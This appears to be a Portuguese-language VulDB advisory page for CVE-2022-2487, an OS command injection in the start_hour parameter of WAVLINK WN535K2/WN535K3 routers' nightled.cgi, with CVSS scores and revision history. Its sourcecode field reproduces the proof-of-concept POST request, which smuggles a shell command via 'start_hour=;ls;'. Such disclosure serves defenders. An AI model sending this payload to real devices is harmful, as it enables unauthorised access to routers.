WAVLINK WN535K2/WN535K3 /cgi-bin/nightled.cgi start_hour direitos alargados

EntradaHistóriajsonxmlCTI

Uma vulnerabilidade foi encontrada em WAVLINK WN535K2 and WN535K3. Foi classificada como crítico. Afectado é uma função desconhecida do ficheiro /cgi-bin/nightled.cgi. A manipulação do argumento start_hour com uma entrada desconhecida leva a direitos alargados. Usar a CWE para declarar o problema leva à CWE-78. O aconselhamento é partilhado para download em github.com. A vulnerabilidade é identificada como CVE-2022-2487. O ataque pode ser levado a cabo na rede local. Os detalhes técnicos estão disponíveis. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada. Esta vulnerabilidade é atribuída a T1202 pelo projecto MITRE ATT&CK. É declarado como proof-of-concept. É possível descarregar a exploração em github.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k.

Campo	20/07/2022 08h40	15/08/2022 08h28	15/08/2022 08h32
cvss2_vuldb_au	S	S	S
cvss2_vuldb_rl	ND	ND	ND
cvss3_vuldb_av	A	A	A
cvss3_vuldb_pr	L	L	L
cvss3_vuldb_rl	X	X	X
cvss2_vuldb_basescore	7.7	7.7	7.7
cvss2_vuldb_tempscore	6.6	6.6	6.6
cvss3_vuldb_basescore	8.0	8.0	8.0
cvss3_vuldb_tempscore	7.3	7.3	7.3
cvss3_meta_basescore	8.0	8.0	8.6
cvss3_meta_tempscore	7.3	7.3	8.4
price_0day	$0-$5k	$0-$5k	$0-$5k
vendor	WAVLINK	WAVLINK	WAVLINK
name	WN535K2/WN535K3	WN535K2/WN535K3	WN535K2/WN535K3
file	/cgi-bin/nightled.cgi	/cgi-bin/nightled.cgi	/cgi-bin/nightled.cgi
argument	start_hour	start_hour	start_hour
cwe	78 (direitos alargados)	78 (direitos alargados)	78 (direitos alargados)
risk	2	2	2
cvss3_vuldb_ac	L	L	L
cvss3_vuldb_ui	N	N	N
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	H	H	H
cvss3_vuldb_i	H	H	H
cvss3_vuldb_a	H	H	H
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rc	R	R	R
url	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
availability	1	1	1
publicity	1	1	1
url	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md	https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
cve	CVE-2022-2487	CVE-2022-2487	CVE-2022-2487
responsible	VulDB	VulDB	VulDB
date	1658268000 (20/07/2022)	1658268000 (20/07/2022)	1658268000 (20/07/2022)
cvss2_vuldb_ac	L	L	L
cvss2_vuldb_ci	C	C	C
cvss2_vuldb_ii	C	C	C
cvss2_vuldb_ai	C	C	C
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rc	UR	UR	UR
cvss2_vuldb_av	A	A	A
sourcecode	POST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;	POST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;	POST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;
cve_assigned		1658268000 (20/07/2022)	1658268000 (20/07/2022)
cve_nvd_summary		A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.	A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.
cvss3_nvd_av			N
cvss3_nvd_ac			L
cvss3_nvd_pr			N
cvss3_nvd_ui			N
cvss3_nvd_s			U
cvss3_nvd_c			H
cvss3_nvd_i			H
cvss3_nvd_a			H
cvss3_cna_av			A
cvss3_cna_ac			L
cvss3_cna_pr			L
cvss3_cna_ui			N
cvss3_cna_s			U
cvss3_cna_c			H
cvss3_cna_i			H
cvss3_cna_a			H
cve_cna			VulDB
cvss3_nvd_basescore			9.8
cvss3_cna_basescore			8.0

◂ Voltar Visão Geral Próximo ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!